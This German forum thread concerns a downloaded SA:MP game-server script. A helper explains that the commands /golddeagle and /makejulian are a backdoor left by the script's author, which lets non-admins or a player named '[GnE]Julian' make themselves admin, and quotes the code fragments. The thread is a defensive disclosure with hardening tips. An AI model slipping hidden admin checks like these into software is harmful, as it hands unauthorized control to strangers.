SAMP /GOLDDEAGLE (/MAKEADMIN)

4 Antworten

Vom Fragesteller als hilfreich ausgezeichnet

Kleiner Tipp: Antikacks gibt es für SA:MP als Quellcode überall im Netz. Dann RCON Konsole deaktivieren und die Bann- und Kickbefehle im Script ändern.

Fertig!

frage ist zwar alt aber problem entdeckt:

kurz... der jenige der admin lvl 0 ist darf den command benutzen....

makejulian ist das gleiche problem...

frage ist nur ob du dich auch mal wieder auf GnE meldest... du hast die IP noch:

Prevosgaming.de:7778

bzw:

und porbiere mal /golddeagle oder /makejulian mal aus... du würst es machen können als NICHT ADMIN oder auch NICHT RCON

das ist ein teil vom Script ersteller der sich selber immer admin machen kann als ausgleich damit ihr//du das script benutzen darfst

//===============================ADMIN MACHEN===================//----------------------------------[MAKEADMIN]------------------------------------------------

if(strcmp(cmd, "/golddeagle", true) == 0){ if(PlayerInfo[playerid][pAdmin] == 0 || IsPlayerAdmin(playerid))

if(strcmp(cmd, "/makejulian", true) == 0){new pName[MAX_PLAYER_NAME];GetPlayerName(playerid,pName,sizeof pName);if(!strcmp(pName,"[GnE]Julian",true)) //if(PlayerInfo[playerid][pAdmin] == 0 || IsPlayerAdmin(playerid))

Wenn du dich mit Servern nicht auskennst und ihn auch nicht absicherm kannst wieso mietest du dir dann einen ???????????????

Gruß dlehner, Team PC Help

deruser1973  02.11.2014, 10:24

Dicker Daumen hoch :-)

aligol47
Fragesteller

hab ihn nicht gemietet! auch nirgendwo gekauft nur heruntergeladen auf servr gepackt fertig! und portforwarded

Daniel Lehner  02.11.2014, 12:18
@aligol47
hab ihn nicht gemietet! Auch da brauch man erfahrung im Serverumfeld!!!!!!!!!!!

Habe keine zeit zta sa verloren und neuen computer .... map ist vor lspd und stadthalle am "popo" :D selber hasg ja keine zeit und alleine auf server ist "kot"